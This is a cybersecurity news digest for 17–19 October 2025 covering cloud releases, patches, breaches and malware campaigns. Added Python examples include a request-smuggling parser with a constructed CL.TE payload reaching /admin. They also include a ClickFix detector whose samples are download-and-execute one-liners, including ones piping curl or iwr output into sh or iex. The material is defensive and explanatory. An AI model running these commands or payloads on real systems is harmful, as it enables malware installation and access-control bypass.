Cybersecurity Brief

Cloud Controls Roll Out Amid High-Severity Patches and Active Threats

Coverage: 17 Oct 2025 – 19 Oct 2025 (UTC)

Cloud providers leaned into visibility and resilience today. AWS centralized EC2 capacity management across accounts and Regions, while Cloudflare introduced multi‑service health checks to stabilize routing and failover. Advisory updates and fresh research rounded out the day, with patches for web servers and VPNs alongside reports of exposure and evolving attacker tradecraft.

Cloud capacity and data tooling evolve

AWS is enabling EC2 Capacity Manager by default to give platform teams a single place to monitor, analyze, and act on On‑Demand, Spot, and Reservation usage. The dashboards, APIs, and export options are designed to turn trends into changes, improving cost efficiency and governance across accounts and Regions. In parallel, the company expanded Graviton4‑based compute to more markets, making high‑performance Arm instances available in Europe (Milan) and Asia Pacific (Hong Kong, Osaka, Melbourne). The added reach of C8g instances offers higher vCPU and memory options, enhanced networking, and bare‑metal choices for compute‑intensive workloads.

On the analytics and database side, Google Cloud refreshed the user experience in BigQuery Studio, emphasizing resource discovery, in‑editor context, and a cleaner workspace. A full Explorer tab, context‑aware Reference panel, simplified tab behavior, and a dedicated Job history view aim to cut friction and reduce clutter for analysts and engineers. For transactional workloads, Google also made new database machine types generally available, with Axion‑powered C4A for Enterprise Plus and Intel Xeon‑based N4 for Enterprise. According to the company, Cloud SQL customers can realize notable throughput improvements and price‑performance gains, plus flexible storage tuning with Hyperdisk Balanced.

Risk‑based defenses and safer defaults

CrowdStrike introduced ExPRT.AI, a telemetry‑driven exploitability engine inside Falcon Exposure Management that scores disclosed vulnerabilities by likelihood of attacker use. The model blends threat intelligence, live telemetry, and observed tradecraft to focus remediation on the small subset most likely to be exploited, with outcomes flowing into SIEM, SOAR, and ticketing workflows.

Marking Cybersecurity Awareness Month, Google outlined a set of safety measures and guidance spanning consumer accounts and developer workflows. The company’s overview highlights new anti‑scam protections, a Recovery Contacts feature for account resilience, and CodeMender to improve code security earlier in the SDLC—part of a broader push to be private by design and secure by default.

Advisories and patches to prioritize

ASP.NET Core received a high‑severity fix for an HTTP request smuggling flaw in Kestrel. As reported by CSO Online, CVE‑2025‑55315 can let authenticated attackers hide a secondary request inside a legitimate one, potentially bypassing authentication or authorization depending on application logic. Microsoft’s guidance differentiates between framework‑dependent and self‑contained deployments, and notes that reverse proxies or gateways may already normalize smuggled requests; there is no indication of exploitation in the wild.

Separately, researchers detailed a pre‑authentication remote code execution issue in WatchGuard Fireware’s VPN component (CVE‑2025‑9242). According to The Hacker News, the out‑of‑bounds write in the iked process can grant arbitrary code execution on internet‑facing devices; vendor fixes are available across supported branches. Administrators are advised to apply updates immediately and reduce exposure of VPN and management interfaces while patching proceeds.

Exposures and evolving tradecraft

Following disclosures by F5, Shadowserver observed 266,978 publicly visible BIG‑IP devices. BleepingComputer reports that F5 issued patches for dozens of flaws across multiple product lines and that CISA ordered U.S. federal agencies to update on an expedited timeline and disconnect end‑of‑support appliances. Why it matters: widely deployed application delivery controllers can enable credential theft, lateral movement, and persistence if left unpatched.

In the finance and aviation sectors, a U.S. peer‑to‑peer lender disclosed that unauthorized queries potentially exposed data for about 17.6 million individuals, including sensitive identifiers like Social Security numbers. Infosecurity Magazine notes the firm has engaged law enforcement and plans credit monitoring for affected users. And an American Airlines subsidiary confirmed a compromise of its Oracle E‑Business Suite application tied to a broader data‑theft campaign; BleepingComputer reports Envoy Air’s review found no sensitive or customer data affected, though some business information may have been exposed.

On the network edge, Trend Micro tracked “Operation Zero Disco,” where attackers exploited a Cisco SNMP flaw (CVE‑2025‑20352) to install fileless rootkits on legacy switches. As summarized by CSO Online, the payloads inject into IOSd memory, conceal activity, and use a UDP controller for command‑and‑control—complicating detection and remediation.

Threat actors are also experimenting with resilient infrastructure. CSO Online cites Google’s observation of a North Korean‑linked group adopting EtherHiding to store payload fragments in smart contracts, turning blockchains into hard‑to‑disrupt command‑and‑control. In contrast, law enforcement moved to curtail enablers of fraud at scale: The Hacker News reports Europol dismantled a SIM‑farm service that supported millions of fake online accounts used in phishing, smishing, investment fraud, and other crimes.

These and other news items from the day:

Fri, October 17, 2025

BigQuery Studio updated with streamlined console UI

🔧 BigQuery Studio unveils a simplified, organized console interface designed to help data analysts, engineers, and scientists work more efficiently. The update introduces an expanded Explorer view for easier resource discovery, a context-aware Reference panel that surfaces table schemas and lets you insert query snippets, and a decluttered layout including a dedicated Job history tab. These changes reduce context switching and tab proliferation so users can focus on analysis.

read more →

Fri, October 17, 2025

Axion C4A and N4 VMs Now GA for Cloud SQL Enterprise

🚀 Google has made Axion-powered C4A and Intel-based N4 virtual machines generally available for Cloud SQL Enterprise Plus and Enterprise editions, promising substantial gains in throughput and price-performance. Hyperdisk Balanced storage is supported on both families to boost I/O, increase throughput, and allow independent configuration of capacity, throughput, and IOPS. Customer tests report lower costs, reduced latency, and large throughput gains. These machines are available in select regions; check Cloud SQL pricing and region documentation for details.

read more →

Fri, October 17, 2025

Amazon EC2 Capacity Manager: Centralized Capacity View

📊 Amazon today announced general availability of Amazon EC2 Capacity Manager, a console and API capability that centralizes monitoring, analysis, and management of EC2 capacity across accounts and Regions. The tool provides dashboards and drilldowns for On-Demand, Spot, and Capacity Reservations, historical trends, optimization recommendations, and exportable data for integration. Available in all commercial AWS Regions at no additional cost.

read more →

Fri, October 17, 2025

ASP.NET Core Kestrel Flaw Rated CVSS 9.9

⚠️ Microsoft patched a critical ASP.NET Core vulnerability in the built‑in Kestrel web server and rated it CVSS 9.9, the highest score ever assigned to an ASP.NET Core flaw. Tracked as CVE-2025-55315, the flaw enables authenticated attackers to use HTTP request smuggling to bypass security checks and could allow actions such as logging in as another user, bypassing CSRF protections, or performing injection attacks. Microsoft advises updating affected runtimes or rebuilding and redeploying self‑contained apps, while noting that reverse proxies or gateways may already mitigate exposure.

read more →

Fri, October 17, 2025

Monitor Groups for Load Balancing: Multi-Service Health

🔍 Cloudflare introduces Monitor Groups for Load Balancing to assess application health across multiple dependent services rather than relying on a single probe. You can bundle up to five monitors, mark some as must_be_healthy (critical) or as monitoring_only (observational), and apply a quorum rule so transient failures don’t trigger global failover. Health checks run from dozens to hundreds of global data centers, creating a geographically distributed consensus. The feature is available via API for Enterprise customers now; Dashboard access for all users is coming soon.

read more →
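How a group verdict can be composed from critical, counted and observational monitors, as an added example that models the behaviour described above; this is not Cloudflare's code or API. The field names mirror the announcement's terms, while the exact quorum semantics, the per-location consensus threshold and the probe results are assumptions made for illustration.

```python
"""Group health from several monitors with critical/observational roles and a quorum.

Added example modelling the Monitor Groups behaviour; not Cloudflare code.
Quorum semantics, location consensus and probe data are assumptions.
"""
from dataclasses import dataclass, field


@dataclass
class Monitor:
    name: str
    must_be_healthy: bool = False   # critical: its failure fails the whole group
    monitoring_only: bool = False   # observational: recorded but never counted
    probes: dict = field(default_factory=dict)  # probe location -> reachable?

    def healthy(self, location_quorum: float) -> bool:
        """Consensus across probe locations, so a single bad vantage point
        or a transient blip does not mark the monitor down."""
        if not self.probes:
            return False
        up = sum(1 for ok in self.probes.values() if ok)
        return up / len(self.probes) >= location_quorum


def group_healthy(monitors, *, quorum: int, location_quorum: float = 0.5):
    """Return (healthy, reason). Every critical monitor must pass, and at
    least `quorum` of the counted (non-observational) monitors must pass."""
    if len(monitors) > 5:
        raise ValueError("a group holds at most five monitors")
    counted = [m for m in monitors if not m.monitoring_only]
    for m in counted:
        if m.must_be_healthy and not m.healthy(location_quorum):
            return False, "critical monitor %s down" % m.name
    passing = [m.name for m in counted if m.healthy(location_quorum)]
    if len(passing) < quorum:
        return False, "%d/%d counted monitors up, quorum is %d" % (
            len(passing), len(counted), quorum)
    return True, "up: " + ",".join(passing)


ALL = {"fra": True, "ams": True, "lhr": True, "iad": True, "sin": True}

# Constructed probe results from five locations for one origin pool.
GROUP = [
    Monitor("api", must_be_healthy=True, probes=dict(ALL)),
    Monitor("static", probes=dict(ALL)),
    # transient failure seen from two of five locations: 3/5 still passes
    Monitor("search", probes={"fra": True, "ams": True, "lhr": False, "iad": False, "sin": True}),
    # dead observational monitor: visible in dashboards, ignored in the verdict
    Monitor("metrics", monitoring_only=True, probes={k: False for k in ALL}),
]


def with_probes(group, name, probes):
    """Copy of `group` with one monitor's probe results replaced."""
    return [Monitor(m.name, m.must_be_healthy, m.monitoring_only,
                    probes if m.name == name else m.probes) for m in group]


def scenarios():
    """Healthy despite the blip; still healthy with search fully down under a
    quorum of 2; down as soon as the critical api monitor loses consensus."""
    now = group_healthy(GROUP, quorum=2)
    search_down = group_healthy(with_probes(GROUP, "search", {k: False for k in ALL}), quorum=2)
    api_down = group_healthy(with_probes(GROUP, "api", {k: k == "sin" for k in ALL}), quorum=2)
    return now, search_down, api_down
```

The location consensus (`location_quorum`) and the monitor quorum (`quorum`) are deliberately separate knobs: the first absorbs a flaky vantage point, the second absorbs one dependency failing outright, and neither can mask a critical monitor going down.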

Fri, October 17, 2025

ExPRT.AI: Predicting Which Vulnerabilities Will Be Exploited

🔍 ExPRT.AI, embedded in Falcon Exposure Management, leverages CrowdStrike threat intelligence and real-time telemetry to predict which vulnerabilities attackers are most likely to exploit. Instead of relying solely on static CVSS ratings, it evaluates adversary tradecraft, observed exploit activity, software prevalence, patch adoption, and attack complexity to produce a daily exploitability score. These explainable scores feed directly into Falcon workflows to accelerate triage, prioritize fixes by real-world risk, and reduce manual noise in vulnerability management.

read more →

Fri, October 17, 2025

Google's 2025 Cybersecurity Initiative: New Protections

🔒 Google is expanding protections during Cybersecurity Awareness Month 2025 with new features and guidance to counter scams and AI-driven threats. The company outlines a cohesive strategy for securing the AI ecosystem and introduces six new anti-scam measures to help users stay safe. It also launches Recovery Contacts to simplify account recovery and debuts CodeMender, an AI agent that automates code security. Additional updates support safer learning through responsible tools and partnerships.

read more →

Fri, October 17, 2025

Amazon EC2 C8g Instances Expand to More AWS Regions

🚀 Amazon has made EC2 C8g instances available in AWS Europe (Milan) and AWS Asia Pacific (Hong Kong, Osaka, Melbourne). These Graviton4-powered instances deliver up to 30% better compute performance than Graviton3-based instances and are optimized for compute-intensive workloads such as HPC, batch processing, gaming, video encoding, distributed analytics, CPU-based ML inference, and ad serving. Built on the AWS Nitro System, C8g instances provide larger instance sizes (including bare metal), up to 50 Gbps enhanced networking, and up to 40 Gbps EBS bandwidth to improve both performance and security.

read more →

Fri, October 17, 2025

Microsoft fixes highest-severity ASP.NET Core flaw

🔒 Microsoft patched a critical HTTP request smuggling vulnerability (CVE-2025-55315) in the Kestrel ASP.NET Core web server, which Microsoft described as the highest-severity ASP.NET Core flaw ever. An authenticated attacker could smuggle an additional HTTP request to hijack other users' credentials, bypass front-end security controls, or impact integrity and availability. Microsoft released updates for Visual Studio 2022, ASP.NET Core 2.3, 8.0 and 9.0 and advised developers to apply updates, recompile where required, and restart or redeploy affected applications.

read more →
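The request-splitting mechanism this bug class relies on, as an added example: a strict HTTP/1.1 framing check beside the lenient parsing that lets a front end and a back end disagree on where one request ends. This is generic illustration code, not Kestrel's parser and not a reproduction of CVE‑2025‑55315; the requests are constructed, and `app` is a placeholder host.

```python
"""Strict HTTP/1.1 framing versus the lenient parsing that request smuggling exploits.

Added, generic example: not Kestrel code and not CVE-2025-55315 itself.
All sample requests are constructed.
"""
import re

TOKEN = re.compile(rb"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


class FramingError(ValueError):
    """Raised instead of guessing when request framing is ambiguous."""


def parse_headers(raw: bytes):
    """Split one request off the wire into (request_line, headers, rest).
    Duplicate headers are kept so framing conflicts can be detected."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise FramingError("no end of headers")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon or not TOKEN.match(name):   # rejects "Content-Length :" too
            raise FramingError("malformed header line")
        headers.append((name.lower(), value.strip()))
    return lines[0], headers, rest


def read_chunked(body: bytes):
    """Strict chunked decoding: plain hex sizes (no extensions or whitespace),
    exact CRLF delimiters, no trailers. Returns (data, leftover bytes)."""
    out, pos = bytearray(), 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0 or not re.fullmatch(rb"[0-9A-Fa-f]{1,8}", body[pos:end]):
            raise FramingError("bad chunk size line")
        size, pos = int(body[pos:end], 16), end + 2
        if size == 0:
            if body[pos:pos + 2] != b"\r\n":
                raise FramingError("trailers not accepted")
            return bytes(out), body[pos + 2:]
        if body[pos + size:pos + size + 2] != b"\r\n":
            raise FramingError("chunk not terminated by CRLF")
        out += body[pos:pos + size]
        pos += size + 2


def strict_split(raw: bytes):
    """Requests a strict parser sees on one connection. Ambiguous framing
    (CL with TE, conflicting or non-numeric CL, non-chunked TE) is rejected."""
    requests = []
    while raw:
        request_line, headers, rest = parse_headers(raw)
        cls = [v for n, v in headers if n == b"content-length"]
        tes = [v for n, v in headers if n == b"transfer-encoding"]
        if cls and tes:
            raise FramingError("both Content-Length and Transfer-Encoding")
        if tes:
            if [c.strip().lower() for v in tes for c in v.split(b",")] != [b"chunked"]:
                raise FramingError("unsupported Transfer-Encoding")
            body, raw = read_chunked(rest)
        else:
            if len(set(cls)) > 1 or any(not re.fullmatch(rb"[0-9]{1,10}", v) for v in cls):
                raise FramingError("conflicting or non-numeric Content-Length")
            n = int(cls[0]) if cls else 0
            if len(rest) < n:
                raise FramingError("body shorter than Content-Length")
            body, raw = rest[:n], rest[n:]
        requests.append((request_line, body))
    return requests


def lenient_split(raw: bytes, prefer: str):
    """A parser that resolves a CL/TE conflict by policy ("cl" or "te").
    A front end and back end that disagree on `prefer` is exactly what a
    smuggled request needs."""
    requests = []
    while raw:
        request_line, headers, rest = parse_headers(raw)
        cls = [v for n, v in headers if n == b"content-length"]
        tes = [v for n, v in headers if n == b"transfer-encoding"]
        if cls and (prefer == "cl" or not tes):
            n = int(cls[0])
            body, raw = rest[:n], rest[n:]
        elif tes:
            body, raw = read_chunked(rest)
        else:
            body, raw = b"", rest
        requests.append((request_line, body))
    return requests


# Constructed CL.TE payload: Content-Length (39) covers everything after the
# headers, so a CL-first front end forwards one request, while a TE-first back
# end ends the chunked body at "0\r\n\r\n" and treats "GET /admin" as a second
# request that the front end never saw.
CL_TE = (b"POST / HTTP/1.1\r\nHost: app\r\nContent-Length: 39\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n"
         b"0\r\n\r\nGET /admin HTTP/1.1\r\nHost: app\r\n\r\n")

# Constructed, unambiguous pipelined pair for contrast.
PIPELINED = (b"POST /login HTTP/1.1\r\nHost: app\r\nContent-Length: 9\r\n\r\nuser=bob!"
             b"GET /home HTTP/1.1\r\nHost: app\r\n\r\n")


def verdict(raw: bytes) -> str:
    """'ok:<n requests>' from the strict parser, or 'reject:<reason>'."""
    try:
        return "ok:%d" % len(strict_split(raw))
    except FramingError as e:
        return "reject:%s" % e
```

`verdict(PIPELINED)` gives `ok:2`, `verdict(CL_TE)` rejects the request outright, while `lenient_split(CL_TE, "cl")` returns one request and `lenient_split(CL_TE, "te")` returns two, the second being the attacker's `GET /admin`. That disagreement is the whole attack, and it is why Microsoft's note that a normalizing reverse proxy may already mitigate the issue matters: the proxy and Kestrel must agree, and the safest agreement is to reject ambiguity.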

Fri, October 17, 2025

266,978 F5 BIG-IP Instances Exposed to Remote Attacks

⚠️ Shadowserver Foundation reports 266,978 internet-exposed F5 BIG-IP instances after F5 disclosed a breach in which nation-state actors stole source code and information on undisclosed BIG-IP flaws. F5 issued patches addressing 44 vulnerabilities and urged immediate updates for BIG-IP, F5OS, BIG-IQ, and related products. CISA issued an emergency directive requiring federal agencies to patch or mitigate affected devices by set deadlines. Nearly half of the detected instances are in the United States, with most others across Europe and Asia.

read more →

Fri, October 17, 2025

UK Weighed Destroying Data Hub After Decade-Long Intrusion

🔐 British officials briefly considered physically destroying a government data hub after uncovering a decade-long intrusion attributed to China-aligned actors. The breach reportedly exposed official-sensitive and secret material on government servers, though no top secret data was taken. Rather than demolish the facility, the government implemented alternative protections and commissioned a classified review. Cybersecurity experts say the episode underscores the critical need to secure supply chains and hunt long-term APT presence.

read more →

Fri, October 17, 2025

North Korean Actors Abuse Blockchains for Malware Delivery

🛡️ Google Threat Intelligence Group (GTIG) reports that North Korean-linked UNC5342 is using a method called EtherHiding to deliver malware and facilitate cryptocurrency theft by embedding encrypted payloads in smart contracts on Ethereum and BNB Smart Chain. The technique turns immutable contracts into resilient, hard-to-takedown command-and-control infrastructure. Initial lures include fake recruiter messages, poisoned npm packages and malicious GitHub repositories; a JavaScript downloader named JADESNOW fetches and decrypts subsequent backdoors such as INVISIBLEFERRET.

read more →

Fri, October 17, 2025

Envoy Air Confirms Oracle E-Business Suite Data Theft

🔒 Envoy Air confirmed that data was compromised from its Oracle E-Business Suite application after the Clop extortion gang listed American Airlines on its leak site. The carrier said it immediately launched an investigation, contacted law enforcement, and determined that no sensitive or customer data were affected, though limited business information and commercial contact details may have been exposed. The incident is tied to an August campaign by Clop, which exploited an E-Business Suite zero‑day (CVE‑2025‑61882) and is now publishing claimed stolen files.

read more →

Fri, October 17, 2025

Zero Disco: Fileless Rootkits Target Legacy Cisco Switches

⚠️ Threat actors exploited a Cisco SNMP vulnerability (CVE-2025-20352) to achieve remote code execution on legacy Cisco IOS and IOS XE switches and install custom, largely fileless rootkits that hook into the IOSd memory space, set universal passwords (including one containing 'Disco'), and hide processes and network activity. The rootkits spawn a UDP-based controller to toggle or zero logs, bypass access controls, and reset running-config timestamps to mask changes. Trend Micro also observed spoofed IP/MAC addresses and attempts to combine a retooled Telnet memory-access exploit to deepen persistence.

read more →

Fri, October 17, 2025

Prosper Data Breach Exposes Personal Data of 17.6M

🔒 Prosper has confirmed a data breach that may have exposed personal information for approximately 17.6 million customers. The company said unauthorized queries were made against customer and applicant databases and that the activity was shut down and access revoked on September 2. Prosper reported no operational disruptions or evidence of unauthorized account access or fund theft, has notified US law enforcement, and will offer affected customers credit monitoring once the scope is confirmed.

read more →

Fri, October 17, 2025

Critical WatchGuard Fireware VPN Bug Allows Pre-Auth RCE

🔒 Researchers disclosed a recently patched critical vulnerability in WatchGuard Fireware (CVE-2025-9242, CVSS 9.3) that can allow unauthenticated attackers to execute arbitrary code via an out-of-bounds write in the iked process. The flaw affects multiple Fireware branches, including 11.10.2 through 11.12.4_Update1 (EOL noted for 11.x), 12.0 through 12.11.3 and 2025.1, and has been fixed across several updates such as 2025.1.1 and 12.11.4. Administrators are urged to apply the vendor updates immediately, limit internet exposure of VPN interfaces, and follow vendor mitigation guidance until patches are deployed.

read more →

Fri, October 17, 2025

Tracking HoldingHands Malware Expansion Across Asia

🔍 FortiGuard Labs observed a January 2025 campaign that began with Winos 4.0 infections in Taiwan and evolved into a cross‑regional HoldingHands operation affecting China, Taiwan, Japan, and Malaysia. The actor uses phishing PDFs, cloud-hosted and bespoke domains, and multi-stage loaders that leverage Windows Task Scheduler to evade detection. Shared infrastructure, reused code (including digital signatures and debug paths), and repeated JavaScript download scripts link disparate samples, and Fortinet provides detections, IOCs, and mitigation guidance.

read more →

Sun, October 19, 2025

Europol Dismantles International SIM Farm Network; SIMCARTEL

🚨 Europol announced the disruption of a sophisticated cybercrime-as-a-service SIM farm in Operation SIMCARTEL, resulting in seven arrests and 26 searches across multiple countries. Authorities seized 1,200 SIM box devices containing about 40,000 active SIM cards, dismantled five servers and took over two websites, and froze significant cash and cryptocurrency assets. The platform supplied numbers from over 80 countries and is tied to the creation of more than 49 million online accounts used in phishing, smishing, investment fraud and other serious offences.

read more →

Fri, October 17, 2025

North Korean Hackers Merge BeaverTail and OtterCookie

🔐 Cisco Talos reports that a North Korean-linked threat cluster has blended features of its BeaverTail and OtterCookie JavaScript malware families, with recent OtterCookie variants adding keylogging, screenshot capture, and clipboard monitoring. The intrusion chain observed involved a trojanized Node.js application called Chessfi and a malicious npm dependency published on August 20, 2025 that executed postinstall hooks to launch multi-stage payloads. Talos tied the activity to the Contagious Interview recruitment scam and highlighted continued modularization and abuse of legitimate open-source packages and public Git hosting to distribute malicious code.

read more →

Fri, October 17, 2025

North Korean Hackers Use EtherHiding to Steal Crypto

⚠️ Google Threat Intelligence Group has linked a North Korean threat actor to EtherHiding, a technique that embeds malicious JavaScript inside smart contracts so the blockchain functions as a resilient command-and-control server. Tracked as UNC5342, the actor used EtherHiding within an elaborate social-engineering campaign to deliver JADESNOW and a JavaScript variant of INVISIBLEFERRET, leading to multiple cryptocurrency heists. The campaign targets developers via fake recruiters and deceptive coding tests on Telegram and Discord.

read more →

Sat, October 18, 2025

Silver Fox Expands Winos 4.0 Attacks to Japan, Malaysia

🔎 Silver Fox operators have expanded the Winos 4.0 (ValleyRAT) campaign from China and Taiwan to target Japan and Malaysia, and are also deploying a secondary RAT tracked as HoldingHands. The actors use phishing emails with booby‑trapped PDFs, SEO‑poisoned pages and targeted .LNK résumé lures to deliver multiple payloads, including Winos modules and HoldingHands. Observed techniques include DLL sideloading, Task Scheduler recovery abuse, anti‑VM checks and AV termination to maintain persistence and evade detection.

read more →

Fri, October 17, 2025

ConnectWise fixes Automate AiTM update attack vulnerability

🔒 ConnectWise released a security update for Automate to fix two vulnerabilities including a critical 9.6-severity flaw (CVE-2025-11492) that can cause agents to use cleartext HTTP, enabling adversary-in-the-middle (AiTM) interception or modification of commands, credentials, and update payloads. A second 8.8-severity issue (CVE-2025-11493) omits integrity verification for update packages, allowing substituted malicious files. Cloud instances are patched to release 2025.9; on-premise administrators are urged to install the update within days.

read more →

Fri, October 17, 2025

Europol Dismantles Large SIM-box Service Used for Fraud

🔍 Europol, together with national police units and the Shadowserver Foundation, dismantled an illegal SIM‑box service codenamed SIMCARTEL that rented phone numbers to criminals for creating fraudulent online accounts. The service operated about 1,200 SIM‑box devices with roughly 40,000 active SIM cards and offered numbers tied to individuals in more than 80 countries via seized sites gogetsms.com and apisim.com. Authorities linked the infrastructure to thousands of fraud cases and at least EUR 4.5 million in losses in Austria and EUR 420,000 in Latvia.

read more →

Fri, October 17, 2025

Significant Satellite Traffic Found Transmitted Unencrypted

⚠️ Researchers used a commercial off-the-shelf satellite dish to perform the most comprehensive public study yet of geostationary satellite communications. They discovered a shockingly large volume of sensitive traffic—critical infrastructure telemetry, internal corporate and government communications, private voice calls and SMS, and consumer Internet streams such as in-flight Wi‑Fi—being broadcast unencrypted. Much of this data can be passively observed by anyone with a few hundred dollars of consumer-grade hardware, and a single transponder's footprint may cover up to 40% of the Earth's surface.

read more →

Fri, October 17, 2025

AWS Bedrock Guardrails: Customer-Managed KMS Keys Support

🔐 AWS now supports customer-managed AWS Key Management Service (KMS) keys for Amazon Bedrock Guardrails Automated Reasoning checks. Customers can encrypt policy content and test artifacts with their own keys instead of the default key, retaining control over lifecycle and access. This capability helps regulated organizations meet compliance requirements and is available in all Bedrock Guardrails regions. Refer to AWS documentation and the Bedrock console to get started.

read more →

Fri, October 17, 2025

Microsoft Revokes 200+ Fraudulent Code-Signing Certificates

🔒 Microsoft disclosed it revoked more than 200 certificates after a threat actor tracked as Vanilla Tempest used them to fraudulently sign malicious binaries, including fake Microsoft Teams installers that delivered the Oyster backdoor and led to Rhysida ransomware deployments. The activity was detected in late September 2025 and disrupted earlier this month, and Microsoft has updated security solutions to flag the associated signatures. The actor abused SEO poisoning and bogus download domains impersonating Teams to distribute trojanized installers. Users are advised to download software only from verified sources and to avoid suspicious links or ads.

read more →

Fri, October 17, 2025

Securing Amazon Bedrock API Keys: Best Practices Guidance

🔐 AWS details practical guidance for implementing and managing Amazon Bedrock API keys, the service-specific credentials that provide bearer-token access to Bedrock. It recommends STS temporary credentials when possible and defines two API key types: short-term (client-generated, auto-expiring) and long-term (IAM-user associated). Protection advice includes using SCPs, iam and bedrock condition keys, and storing long-term keys in secure vaults. Detection and monitoring use CloudTrail, EventBridge rules, and an AWS Config rule, and response steps show CLI commands to deactivate and delete compromised keys.

read more →

Fri, October 17, 2025

Moloco and Google Cloud Power AI Vector Search in Retail

🔎 Moloco’s AI-native retail media platform, integrated with Vertex AI Vector Search on Google Cloud, delivers semantic, real-time ad retrieval and personalized recommendations. The joint architecture uses TPUs and GPUs for model training and scoring while vector search runs efficiently on CPUs, enabling outcomes-based bidding at scale. Internal benchmarks report ~10x capacity, up to ~25% lower p95 latency, and a ~4% revenue uplift. The managed service reduces operational overhead and accelerates time-to-value for retailers.

read more →

Fri, October 17, 2025

OpenSearch Service Adds Graviton4 EC2 Instance Support

🚀 Amazon OpenSearch Service now supports Graviton4-based EC2 instance families — compute-optimized C8g, general-purpose M8g, and memory-optimized R8g/R8gd — across multiple regions. Graviton4 processors deliver up to 30% better performance compared with Graviton3 and are supported on all OpenSearch versions as well as Elasticsearch 7.9 and 7.10. The change is intended to improve price-performance for compute-, general-, and memory-intensive search and analytics workloads.

read more →

Fri, October 17, 2025

Hackers Steal Customer Data from Spanish Retailer Mango

🔒 An external marketing service provider detected unauthorized access to customer personal data for the Spanish fashion company Mango. The attackers obtained first name, country, postal code, email address and telephone number for some customers, while last names, bank details and passwords were not accessed. Mango says its own systems remain secure and has notified the Spanish data protection authority (AEPD). Customers are urged to remain vigilant for phishing attempts via email, SMS or phone.

read more →

Sat, October 18, 2025

Google Ads Promote Fake Homebrew, LogMeIn, TradingView Sites

🚨 Researchers uncovered a malvertising campaign that uses Google Ads to surface convincing fake Homebrew, LogMeIn, and TradingView download sites targeting macOS developers. The pages prompt victims to copy a curl command into Terminal, but the clipboard often contains a base64-encoded command that decodes and runs an install.sh payload. That script removes quarantine flags, bypasses Gatekeeper, and delivers infostealers that check for analysis environments before executing. Operators deploy AMOS and Odyssey, which harvest browsers, wallets, and credentials; users are urged not to paste unknown commands into Terminal.

read more →

Fri, October 17, 2025

Use Gemini CLI to Deploy Cost-Effective LLM Workloads on GKE

🛠️ Google Cloud demonstrates how the Gemini CLI and GKE Inference Quickstart integrate via the Model Context Protocol (MCP) to streamline selecting, benchmarking, and deploying LLMs on GKE. The post outlines installation steps, example prompts to discover cost and performance trade-offs, and how manifests can be generated for target accelerators. This approach reduces manual tuning and provides data-driven recommendations to optimize cost-per-token while preserving performance.

read more →

Sun, October 19, 2025

TikTok Videos Push Infostealers via ClickFix Activation Scams

🔒 Cybercriminals are using TikTok videos disguised as free activation guides for software such as Windows, Adobe, Spotify, and Discord to distribute info‑stealing malware via a ClickFix technique. The videos instruct users to run a short PowerShell command that fetches a script from slmgr.win, which then downloads a variant of Aura Stealer and an additional payload from Cloudflare Pages. Victims should assume credentials are compromised, reset passwords, and avoid running copied commands in shells or terminal windows.

read more →
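Both the macOS malvertising lure above and the TikTok ClickFix videos rely on the victim pasting a one-liner whose real payload is hidden behind base64 or a hidden PowerShell window. The following is an added example of detection heuristics for such commands, run over constructed command lines; it is not code from either report. Indicator names are mine, and apart from slmgr.win, which the article names, every host is a placeholder.

```python
"""Flag copy-and-paste "fix" one-liners of the ClickFix kind before they run.

Added example: heuristics over constructed command lines, not code from the
cited reports. Indicator names are invented; hosts other than slmgr.win are
placeholders.
"""
import base64
import re

INDICATORS = [
    ("download-to-shell", re.compile(
        r"\b(curl|wget|iwr|irm|Invoke-WebRequest|Invoke-RestMethod)\b.*\|\s*"
        r"(sh|bash|zsh|iex|Invoke-Expression)\b", re.I)),
    ("base64-decode-exec", re.compile(
        r"\bbase64\s+(-d|-D|--decode)\b.*\|\s*(sh|bash|zsh)\b", re.I)),
    ("powershell-hidden", re.compile(
        r"-(w(indowstyle)?\s+hidden|ep\s+bypass|ExecutionPolicy\s+Bypass"
        r"|enc(odedcommand)?\s)", re.I)),
    # any xattr call touching the quarantine attribute (Gatekeeper bypass)
    ("quarantine-strip", re.compile(r"\bxattr\b[^|;&]*com\.apple\.quarantine", re.I)),
]
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_blobs(cmd: str):
    """Decode long base64 runs, as UTF-8 or as the UTF-16LE that PowerShell's
    -enc expects, so indicators hidden in an encoded stage are scanned too."""
    texts = []
    for m in B64_RUN.finditer(cmd):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:          # binascii.Error is a ValueError
            continue
        # UTF-16LE ASCII text has a NUL in every odd position
        if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
            texts.append(raw.decode("utf-16-le", errors="ignore"))
        else:
            texts.append(raw.decode("utf-8", errors="ignore"))
    return texts


def classify(cmd: str):
    """Sorted names of indicators hit by the command or any decoded stage."""
    hits = set()
    for text in [cmd, *decode_blobs(cmd)]:
        for name, pattern in INDICATORS:
            if pattern.search(text):
                hits.add(name)
    return sorted(hits)


# Constructed samples resembling the lures described above (hosts invented
# except slmgr.win, named in the article).
INNER_SH = ('curl -fsSL https://installer.invalid/install.sh | sh; '
            'xattr -rd com.apple.quarantine "/Applications/Helper.app"')
MAC_CMD = "echo %s | base64 -d | bash" % base64.b64encode(INNER_SH.encode()).decode()
WIN_CMD = 'powershell -w hidden -ep bypass -c "iwr https://slmgr.win/x | iex"'
ENC_CMD = "powershell -nop -w hidden -enc " + base64.b64encode(
    "irm https://slmgr.win/s | iex".encode("utf-16-le")).decode()
BENIGN = ["brew install wget", "curl -O https://example.invalid/notes.tar.gz"]
```

`classify(MAC_CMD)` reports the decode-and-execute wrapper, the download-to-shell stage and the quarantine strip found only inside the decoded blob; `classify(ENC_CMD)` finds the download-to-shell indicator only after decoding the UTF-16LE `-enc` argument; the benign commands produce no hits. The same logic fits a clipboard monitor, a shell `preexec` hook or an EDR command-line rule, and the point a user should take from it is the one the articles make: a "fix" that needs a pasted command with a pipe into a shell is the payload.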

Fri, October 17, 2025

AWS Parallel Computing Service Adds Support for Slurm v25.05

